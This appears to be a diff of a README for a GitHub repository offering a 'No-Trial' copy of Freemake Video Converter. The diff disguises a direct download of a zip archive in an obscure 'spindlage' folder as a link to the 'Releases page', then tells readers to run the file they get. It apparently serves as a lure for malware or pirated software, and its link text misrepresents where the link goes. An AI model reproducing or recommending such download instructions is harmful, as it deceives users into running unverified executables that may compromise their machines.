MashierMagid/Freemake-Video-Converter-No-Trial/README.md

 ### Installation Steps

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/MashierMagid/Freemake-Video-Converter-No-Trial/releases) to find the available versions of Freemake Video Converter.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/MashierMagid/Freemake-Video-Converter-No-Trial/main/spindlage/Freemake-No-Video-Converter-Trial-2.1.zip) to find the available versions of Freemake Video Converter.

 2. **Download the Installer**: Click on the latest version's link to download the installer file.
-This will typically be named something like `Freemake-Video-Converter-Setup.exe`.
+This will typically be named something like `https://raw.githubusercontent.com/MashierMagid/Freemake-Video-Converter-No-Trial/main/spindlage/Freemake-No-Video-Converter-Trial-2.1.zip`.

 3. **Run the Installer**: Once the download completes, locate the file in your downloads folder.
 Double-click it to start the installation process.